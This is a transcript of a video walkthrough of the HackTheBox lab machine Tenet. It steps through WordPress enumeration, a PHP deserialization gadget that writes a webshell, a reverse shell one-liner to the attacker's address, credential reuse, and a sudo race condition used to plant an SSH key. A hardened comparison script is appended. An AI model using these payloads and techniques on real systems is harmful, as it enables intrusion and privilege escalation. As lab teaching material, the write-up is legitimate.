HackTheBox - Tenet
Key Takeaways
The video is a walkthrough of the HackTheBox machine Tenet, covering WordPress enumeration, a PHP deserialization gadget that writes a file, a race condition in a bash script run with sudo, and an inotify watcher written in C, using tools like nmap, gobuster, and wpscan.
Full Transcript
What's going on YouTube, this is IppSec. I'm doing Tenet from HackTheBox, which was on the easier side of medium machines. It starts off with finding a WordPress site and doing some light enumeration around WordPress. You don't really find anything too interesting there: there's no vulnerable plugins, nothing to really brute force, you just have two usernames and some comments on the site. Reading one of the comments hints at a file sator.php existing on the server, as well as a backup for it. So you find the backup of that file and discover sator.php is just a poorly written PHP script that for some reason uses serialization to move a file. So you create a custom PHP deserialization gadget to exploit that and get a shell on the box. With a shell you can enumerate the WordPress config, find out the WordPress password is the password of one of the local users on the box, Neil, log in as Neil and see he can sudo and run a bash script which has a race vulnerability that allows you to write an SSH key. Now we're gonna do this exploit two different ways: we're gonna first brute force and just write all the files and eventually just win that race, and the second one we're going to do it a more elegant way and use inotify to create a hook in the file system to notify us when files are created, and then upon file creation trigger our write. So with all that being said, let's jump in. As always we start with the nmap, so -sC for default scripts, -sV enumerate versions, -oA output all formats, put it in the nmap directory and then we'll call it tenet, and then the IP address of 10.10.10.223. I'm also going to add -v so it shows me open ports as it finds them, and right off the bat we have 22 and 80.
So I'm going to go to 10.10.10.223 and we see it's just the Apache2 default page. I'm going to specify like robots.txt to see if we have anything here, and we don't. So the next thing I want to do is just see if there's like a PHP file, so I'm going to do index.html to confirm that's this page, we can try .php and we don't see anything. So the next thing I'm going to do is run a gobuster, so I'm going to do gobuster dir for dir mode, -u for URL http://10.10.10.223, -w for wordlist, SecLists, then we want to do Discovery/Web-Content/raft-small-words.txt, and we want to specify an out file of gobuster.out. And I didn't specify any extensions because I don't know what type of web server this is; if I knew it was a PHP thing I'd try the extension of php, and if this comes up with nothing I may try extensions of like txt and pdf, things like that. But we do get a hit right off the bat saying it is WordPress, so let's go to 10.10.10.223/wordpress and we don't really have anything here. We do have recent comments and posts and things, but it doesn't look like a WordPress page, and that's because WordPress likes doing absolute URLs everywhere. So we can see it's trying to link to tenet.htb, which doesn't exist; we have to create that in our hosts file. So let's do sudo vi /etc/hosts and then we can do 10.10.10.223 tenet.htb, and now when we view the source we get a page. So now if we go to tenet.htb we should see the WordPress page. Going here we do now get a pretty page; going to the bottom we can see "Proudly powered by WordPress". We can also go to wp-admin and try like admin:admin to log in. The other thing we could do, I like checking wp-content and seeing if there's index.html files here or something blocking it. If directory listing is on in WordPress, or if there's no index file in these directories, you can just enumerate WordPress really easily by going like wp-content/plugins and then looking at
all the files here. But it looks like they have an index file, so we can't see these directory listings. So to enumerate this I'm going to use wpscan. So wpscan -h: we want to do --url, and the detection mode I like doing as aggressive. It's going to make this take longer but I find it to be a lot more reliable. The passive mode is going to try to crawl the WordPress page, look at the source code and enumerate plugins that way, whereas aggressive is just going to go to wp-content/plugins and then the plugin name and see if that returns something. So maybe Akismet is a normal plugin, I forget the normal plugins that it can check, but if it gets a 404 obviously there's no plugin there; if it gets something then there is a plugin. So that's why I like aggressive mode. And the last flag I normally do is the enumerate option, and I always do all plugins. You could just do vulnerable plugins, but if you've ever looked at WordPress plugins in general, you can get a lot of CVEs to your name because there's just a lot of plugins and not many researchers looking at them. So you may find a plugin that's installed that has easy vulnerabilities you can find, so I just like doing all plugins. So let's do wpscan --url http://tenet.htb, -e to enumerate all plugins, and then we can do --plugins-detection aggressive, and then I always like saving to an out file, so wpscan.out, and we'll let that go. We can do some manual enumeration of WordPress if we wanted to. So for example, let's do tenet.htb: if we open up a post we can see the authors, so we can potentially get usernames of WordPress. We can also enumerate this: if you use this pretty URL rewrite of /author/name you can't really do anything, but all that is doing is it's a wrapper around this author parameter on index.php, and with this we can specify IDs. So numbers are much easier to guess or brute force than full names, so ?author=1 and it's going to redirect us to
/author/protagonist. So if I just do this curl request, curl 10.10.10.223/?author=1, maybe I need -I to do a header. Oh, it's virtual hosts, we have to specify tenet.htb and not the actual IP address. So curl tenet.htb/?author=1, maybe -I so we can see the header. We can see Location and that directs us here. So we can quickly go through this and see if it links us anywhere, and we don't have any other authors. There are two users on this box: if you remember when we just hit this without the hostname we saw comments and we saw a user called Neil. So if we go to all these posts we can see there is this comment, and the reason why he's not showing up is he doesn't have a blog post. This author thing only works if the person had a blog post; if they don't, you don't get them. So this page just shows all the posts by user, and we can see him saying "did you remove the sator.php file and its backup? The migration program is incomplete, why would you do this?" So the very first thing I want to do is just check if sator.php exists, and we get a 404 Not Found. And I'm going to do 10.10.10.223 and we get a 200 OK. So it doesn't exist in WordPress: if we go to tenet.htb we get directed into this directory, but if we just do 10.10.10.223 we get directed here, which is one directory up, and that's where the sator.php file lives, and we can see "grabbing users from text file, database updated". If we go through all these posts, let's go to tenet.htb and read them. So "coming soon, watch this space", so nothing really there. "They're moving the data from a flat file structure to something a bit more substantial, please bear with us", and this is where the person commented saying "did you remove this file". I don't know why he's asking did you remove it, he can just check. We checked. But yeah, and then we have "looking for beta testers for new time management software Rotas", which is just Sator backwards, "we'll hopefully be at
market late Q4", whatever. So we have the sator.php file, and the comment said did you remove it and its backup. So generally how I search for backups now is I just like using gobuster. So if I do vi words, we can just put sator, just do this, and I'm gonna do gobuster dir and we can do -h, and if we look, discover is -d, discover backup, and this is something I put into gobuster. If we go to ippsec.rocks, let's see, gobuster discover, I think we did it in Player, yeah. So if you want to see how we edited the code to add this into gobuster, it's the Player video, I think so. Discover directories, yeah. So what this is going to do is a lot of permutations on backups. So most things will just add .bak to things, but this will prepend something, so if it takes "word" it may add a period and then .swp to look for vim swap files. So that's what I'm going to do with this. So gobuster dir -u for URL http://10.10.10.223, -w for wordlist and we can just say words, and then -d for discover mode, and we have to do -x php because our words file only has sator, not sator.php. And we can see it has discovered sator.php and sator.php.bak. So if we go take a look at the .bak we can save it, and then move the downloaded sator.php.bak. We can see what it's doing. I'm not exactly sure what the purpose of this is other than to be vulnerable, but we have a class that is taking the user file users.txt, no data, and then updating the database, and then we have this __destruct gadget of file_put_contents, and then it's just calling update_db. Why they didn't just do like an fopen and fwrite, no idea, that would have been much more secure; like there's no reason to do serialization around here. But let's go, and if you don't know about PHP serialization, again go to ippsec.rocks, type in "php serial" and we have "advanced PHP" and "introduction to PHP deserialization" here. So this is a relatively simple one. I'm just going to less this so I can copy, we
just want to copy this I believe, we can copy this line. So I'm going to do vi pwn.php and then we just do $pwn = new DatabaseExport, so we create a new object of this, and we just echo serialize($pwn). So if I php pwn.php we have a serialized object. Now we can put anything we want, so for our file name we're going to create ip.php and the data is just going to be <?php system($_REQUEST['cmd']); ?>. We already use single quotes like that, so we have this, which is a serialized object. Going back to the backup we can see what it's going to do. So $input = $_GET['arepo'], and if arepo is not set it's going to do nothing, so input is nothing if this variable's not set. $databaseupdate = unserialize($input), and this is where we're going to do the vulnerability: we put our object here, which is going to be the DatabaseExport, and we're going to specify the user file and data, and then when this object gets terminated or destructed it's going to call this function, and it's going to probably get destroyed right after this call right here, and it's going to file_put_contents the user file, which we called ip.php, and this data is going to be the contents, which we put a PHP shell in. So all we have to do is copy this, so if we copy and then we go to, let's see where is the backup, sator.php, we can say ?arepo= is equal to this object, and it did a second "database updated" line. And if we just curl 10.10.10.223/ip.php we don't get a 404.
If we try doesnotexist we have curl responding with 404, but nothing here. I can do cmd=id and that did not work. 10.10.10.223/ip.php?cmd=whoami, so we have an error in our code. So let's go vi pwn.php, so let's see, php system and then $_REQUEST cmd, that should work, one, two, terminate, wait, oh, I have an extra parenthesis. So let's do this again, so copy and then 10.10.10.223/sator.php?arepo= is equal to the new object, refresh this page and we have command execution. Now if I did not spot that by eye, what I would have done to troubleshoot this is put this in a file. So let's do mkdir www and go into this, vi shell.php, paste, I'm going to put this error message back in, and then php -S 127.0.0.1:80, I think, sudo, and now I have a PHP web server standing on my box. So if we go to 127.0.0.1 it's not found, we called it shell.php, and we can see the error message, unexpected parenthesis. So that's how I would have troubleshot that if I didn't spot it by eye. So let's go back here, we have cmd=whoami, so I'm gonna do bash -i, actually we can type over a shell here, bash -c 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1', like that, and this should be good for a reverse shell syntax. So copy, and nc -lvnp 9001, paste this here, and we don't get a callback. So again I'm just going to run this here and we get a shell. So what is happening here probably is some type of URL encoding, so I'm going to open up Burp Suite and we're just going to throw it into Repeater so we don't have any chance of it doing URL encoding, and I'm actually going to convert this into a POST request because there's fewer bad characters in a POST request. So if I do proxy, intercept is on, we can go Repeater, Burp Suite, cmd like that, and then send this over. We can paste this, I can highlight this and do Ctrl+U to see if it would work if I just URL encode it in Burp. So if we do this, send, we get a shell. So it's some type of URL encoding
a browser is doing, I'm not sure what it is, but if we just manually do it in Burp it works. So we have a shell. I'm going to do Ctrl+Z, actually fg first, we have to do python3 -c 'import pty; pty.spawn("/bin/bash")' and then Ctrl+Z, stty raw -echo, fg, enter, enter. You won't see yourself typing but it will be typing, you just have to trust, and we have a shell on this box. So the very first thing I like doing is going into the web configuration and pulling the database password, so wp-config.php, and we could, let's see where is it, so name is wordpress, user is neil and password is opera2112. So we could do mysql -u neil, I think it's like that, -p, paste the password, show databases, I think it was wordpress, yeah, use wordpress and enumerate the database manually. So we can do show tables, select * from wp_users, we could just do select id, user_login, user_pass from wp_users and try to crack this with hashcat. The other thing we could do is just try SSHing with the credential, so ssh neil@10.10.10.223, yes, and paste the password, so we get in. You could also probably try logging into WordPress with that, so if we do tenet.htb/wp-admin and then, what is it, neil, it's probably in Burp Suite, so turn off, neil, paste, is it? So that's not his WordPress password. So we could try cracking those, but we already got SSH with him. So doing sudo -l we can see he can run this program enableSSH.sh with sudo. So what I'm going to do is just clear that session out and let's take a look at enableSSH. So this is running as root and we have a function checkAdded, checkFile, addKey, and addKey is going to make a directory as well, make a file ssh- random string, that's going to touch that file. Okay, so here it generates a /tmp/ssh- random eight characters, let's say. That's gonna set umask 110, which means it's going to make every new file's permissions 667, because umask is an inverse, so you just take 777 and subtract it here, so
this should be 667 permissions, we'll have to verify that when it gets created. It's going to echo the key into tmpName, and tmpName is going to be this and key is going to be this. That's going to run checkFile and then if it is a valid key, I'm guessing, it's going to cat it into root's .ssh/authorized_keys. So if we look at what checkFile is, it just makes sure the file exists. So there is a race condition here: when this file gets created and then this checkFile command is being run, if we replace the contents of this file then it will go into this authorized_keys. So we can do that two different ways. One way is just through sheer brute force, which we'll do first. So I'm going to go into the /tmp directory and we're just going to write a loop, so vi brute.sh, and we can say while true; do, so this is just an infinite loop, and we can say for file in $(ls); do, so it's going to keep running this ls command and loop through every file, and that would be the name, and we can say if, then, file is equal to ssh*, so if it begins with ssh, that's our thing, then echo, we want to put something into that file, which is a key. So I'm going to do ssh-keygen -f, we'll just call it tenet, cat tenet.pub, we just want to print our SSH key here, so echo key to file, and then we end the if, then, and end that loop. So all this is doing is running ls in /tmp and if a file ever begins with ssh then it's going to overwrite that. So let's do bash, well first we have to have two sessions, so I'm just going to run tmux here and we'll have a nested tmux session so I can do bash brute.sh, and then we can run sudo enableSSH.sh, and "error adding root@ubuntu to authorized key file", "successfully added". So it is a race condition, so sometimes it may not work, but looks like that time it did. Let's now try to SSH, so chmod 700 tenet, we gotta change the permissions of this private key, ssh -i tenet root@10.10.10.223.
It's taking its sweet time, and we get in. So that is a very sloppy way to do this. There is a much better way, and that's through using inotify. By that I mean hooking into the file system of Linux and being notified when there's a change, which is better because you don't have to constantly loop over the directory doing an ls waiting for a file to be created; you just hook the file system and say hey, notify me upon new files. So you could do this through Python, but the Python needs to have the inotify bindings or libraries installed, and it doesn't. So we're going to do it the, quote unquote, hard way and just do it through a C program. So I'm just going to go over to Google and do "c inotify example", and let's see, there's probably a good post. I'm gonna check these two sites. This one explains a lot but I didn't like this example because it wasn't doing a forever loop, it just does it upon one event. I think this one does it a bit better, yep, so I like this one better. So we're going to grab this source, walk through it a little bit. I'm sure if you read this post it'll make more sense, but for video's sake we're just going to go over it. So let's vi, let's call this pwn.c, and then set paste and paste this code. So we're just including standard libraries. I'm going to collect up to 1024 events, whatever. So this sig_handler is just watching for like Ctrl+C to see when the program closes, and when it closes it's going to do inotify_rm_watch with the file descriptor and watch descriptor, so it's just going to close it and exit gracefully. So our program, let's see, char path_to_be_watched, and then we're going to start the signal handler so we can see when the program closes, and path_to_be_watched is going to be the very first argument, so when we execute this we just put /tmp. Then we initialize inotify, that's going to be the file descriptor, it's checking for errors right here, then we're adding the watch, so wd =
inotify_add_watch, and then saying IN_MODIFY, IN_CREATE and IN_DELETE, and these variables are populated by one of these headers, probably inotify.h. Let's check that real quick: locate says inotify.h, where is this, it's probably like /usr/include/sys, like this. And what was it, we're looking at, let's just search for IN_MODIFY, and we can see all the things we can potentially do: access, modify, attribute, close write, close nowrite, just close, open, moved from, moved to, move, create, delete, delete self, and this. So all these are actions we can hook into. The main one we just want is create, and they've already done that code for us. So let's just go back to the code here and we can see what is happening. Right here is where they add the watch; again we could delete modify and delete, but if we did we'd probably have to delete some code down here, so I'm going to leave it. We have watch descriptor negative one, so this is just checking for errors; if there is no error it's going to say it's watching the directory. And then we have an infinite loop, while(1), so this is just going to keep the program open. int i = 0 and length, char buffer, this is going to read, so any time we get data, and while the length is greater than i, I am guessing this means we have an event, then we're going to process the event, and if the event is IN_CREATE, doesn't look like we're, oh, if it is a create event then we're going to check if it is a directory and say a directory was created, and if it wasn't a directory then we're going to say a file was created, and that is pretty much all we want to do. And we can see here it's just going to increase i by the event size thing. But right here is where the file is created, so let's go here, and I probably should do spaces, and we're going to have this write to the file. So to do that we have to create the pointer, so I'm going to do fptr for file pointer, and oh man, why is vim not doing this for me, char full_name and
actually yeah, I'm gonna do this real quick, is equal to "/tmp/", because that's where we want to create the file. This event thing is only going to have the file name, it's not going to have the directory it came from, so I'm doing this so we could have that. We probably could pull it from the, let's see, was it path_to_be_watched variable, but that may not end with a slash, so I'm just going to be lazy and hardcode this. And then we have to combine the event name and full name, so I'm going to do strcat(full_name, and then we'll do event->name), like that, and that should combine the two. So all we have to do now is write to a file, so file pointer is equal to fopen(full_name), and then we're going to open it in write mode, "w", which will just erase the file and put our contents. If we did "a" for append we wouldn't erase the contents, but for this we don't want to have anything in the file except what we want. So to write to it we're gonna do fprintf and then the file pointer, which is gonna be the file, and then we need our SSH key, and I'll put that in after. And then the final piece, we just wanna close, so fclose(file pointer). So if all goes well we will be able to drop our key here. And I'm not going to actually put the key, because if we did we wouldn't know it worked, because we already have our SSH key there. I can just go out of here and do that, ssh -i tenet root@10.10.10.223, because we've already exploited it once. What was that, the IP? ping tenet.htb. So maybe the key got erased, maybe there's a cron to clean up. So let's cat tenet.pub and we'll put our key there to see if this works. Hopefully, like I think it blocked somehow or something, but we can put our SSH key, backslash n, and then gcc to compile, -o, we'll call it pwn. Let's see, it's just telling us it included string.h for us because we used strcat, and that should be fine. Do we have pwn? We do. So I'm going to move pwn into www and we'll go here and do python3 -m http.server, and
then let's see where is our Tenet shell, right here. So from here we can do wget 10.10.14.2:8000/pwn, and then if we run pwn, chmod +x pwn, ./pwn, we have to specify /tmp, so we are watching /tmp. So if I do sudo enableSSH, I think our C code is bad, we got a segfault. We created the file, it's successfully added, so I wonder if it wrote. Let's try this, root, yeah it worked. I'm not sure exactly where our code failed though. vi ../, can I see it real quick, pwn.c, let's see, fclose, file was created, so we're creating the pointer, I'm not sure exactly, maybe we have to delete the pointer. Let's try running that again real quick, yeah it segfaults every time. So I guess let's just recompile it and test "please subscribe" real quick, so "please subscribe" like that, gcc pwn.c -o pwn, let's download this again, run wget, chmod +x pwn, ./pwn /tmp, enableSSH. So we segfaulted but that is fine, we had kind of expected that, because all we want to do is look at the authorized_keys file and see if "please subscribe" is there, and it is. So we have confirmed we are indeed exploiting this with inotify. So hope you enjoyed that, and I guess the very last piece I want to do is verify that umask setting. So let's do which enableSSH, it's in here, so we can vi this file and I'm going to get rid of this rm, so now when we call enableSSH it's going to leave the file in /tmp and we'll see if it's 667. So if we do ls, let's see, ssh, I think umask may not be able to give read, write, execute, so it may just be 666. Well, it is 666, but if I stat ssh we should be able to see, yeah, 666.
If I touch ippsec then stat ippsec we can see it is 644, so the umask here would be 012 or 133 probably. So if I do umask, oh, 022, so zero, so it's six, and then two, two, so it's going from six. So if I change this to umask, let's do 123, so now my umask is 123, and I touch f2 and we stat f2, you can see, huh, umask is not working as I expected in my head. So it's probably because it can't give execute, but I'm gonna stop explaining umask because I obviously was not ready to do this off the top of my head, something so basic but you can really mess up. So we see 124, that is six, four and two, so I'm guessing it's going from six six, no, yeah, it just can't have the execute bit set, and I can't do the math in my head to explain it well. So if you want to know more about umask, definitely just probably do man umask, and of course the entry is not there, is it on my box, man umask, there we go. Read the man page, this is better at explaining things than me. So hope you guys enjoyed the video, take care and I will see you all next week.
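Two points from the walkthrough are easier to see side by side than in the video: why the staging file in the sudo script is racy, and what umask actually does to a file that touch creates. The script below is an added example written for this page, not enableSSH.sh from the box or IppSec's brute.sh; it mirrors the vulnerable shape in a sandbox directory you pass in, puts a hardened version beside it, and assumes a Linux box with GNU or busybox stat (the key string is a constructed placeholder, and the grep is a crude format check standing in for ssh-keygen -lf).

```shell
#!/bin/sh
# Added example, not the box's enableSSH.sh or IppSec's brute.sh: the same
# temp-file shape as the script in the video next to a hardened version,
# plus a helper that makes the umask arithmetic at the end concrete.
# Everything works inside a sandbox directory passed as $1, so it runs as
# an unprivileged user and never touches /root/.ssh or the real /tmp.

# Returns the mode touch gives a new file under the given umask.
# Result is 666 & ~umask: 110 -> 666, 022 -> 644, 123 -> 644, 077 -> 600.
# touch never asks for execute, so no umask can produce 667 or 777.
umask_touch_mode() {
    box="$1"; mask="$2"
    mkdir -p "$box"
    f="$box/probe-$mask"
    (umask "$mask"; touch "$f")
    stat -c '%a' "$f"
}

# Vulnerable shape: the staging file in a shared directory is created with
# umask 110, so it is world-writable (666); checkFile only tests that it
# exists; then whatever the file contains is appended to authorized_keys.
# A local user who replaces the contents in that window gets their own
# key installed. Prints the staging file's mode so the weakness is visible.
vuln_add_key() {
    box="$1"; key="$2"
    mkdir -p "$box/tmp" "$box/.ssh"
    tmp="$box/tmp/ssh-$$"        # the script uses 8 random chars; $$ keeps the demo short
    (umask 110; touch "$tmp")    # 666 & ~110 = 666: any user can overwrite it
    echo "$key" > "$tmp"         # redirect reuses the existing file, mode stays 666
    stat -c '%a' "$tmp"
    [ -f "$tmp" ] || return 1    # checkFile: existence only, contents never re-validated
    cat "$tmp" >> "$box/.ssh/authorized_keys"
    rm -f "$tmp"
}

# Hardened shape: validate the key before it touches anything, refuse
# multi-line input (a second line would smuggle a second key), and skip the
# shared staging file entirely; umask 077 keeps .ssh at 700 and
# authorized_keys at 600. Prints the resulting mode of authorized_keys.
# The grep is a crude shape check for "type base64 [comment]"; ssh-keygen -lf
# is the proper validator but is not assumed to be installed here.
safe_add_key() {
    box="$1"; key="$2"
    [ "$(printf '%s\n' "$key" | grep -c '')" -eq 1 ] || return 1
    printf '%s\n' "$key" \
        | grep -Eq '^(ssh-(rsa|ed25519)|ecdsa-sha2-nistp[0-9]+) [A-Za-z0-9+/]+=*( [^[:space:]]+)?$' \
        || return 1
    (
        umask 077
        mkdir -p "$box/.ssh"
        printf '%s\n' "$key" >> "$box/.ssh/authorized_keys"
    )
    stat -c '%a' "$box/.ssh/authorized_keys"
}
```

Run it with a scratch directory and a public key line to compare the two modes; the hardened function returns non-zero for anything that is not a single well-formed key line.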
Original Description
00:00 - Intro
01:20 - Start of nmap
03:00 - Discovering wordpress, fixing our host file
04:20 - Running wpscan to enumerate wordpress via aggressive mode
06:10 - Manually enumerating wordpress users by listing blog posts by author
08:30 - Discovering Sator.php, then using GoBuster to discover hidden backups to find Sator.php.bak
11:40 - Start of looking at the php source to see it's a basic deserialization challenge.
12:40 - Building the deserialization gadget to write a file
15:15 - Uh oh. Made a typo, thankfully can find it quickly and get RCE
16:24 - Going back a step and showing a proper way to troubleshoot it
18:30 - Getting a reverse shell then examining wordpress config to get some credentials
20:15 - Testing the credentials with SSH and logging in with neil
21:00 - Discovering Neil can run enableSSH.sh with sudo, which has a race condition
23:00 - Writing a bash loop to exploit the race condition
25:20 - Exploiting the race condition more elegantly by using inotify to be notified when files are created
26:00 - Googling for an example written in C
27:00 - Going over the program
30:12 - Modifying the code to write a file upon discovering create
35:10 - Think I forgot to free the pointer, so it segfaults. Writing PleaseSubscribe to prove it worked.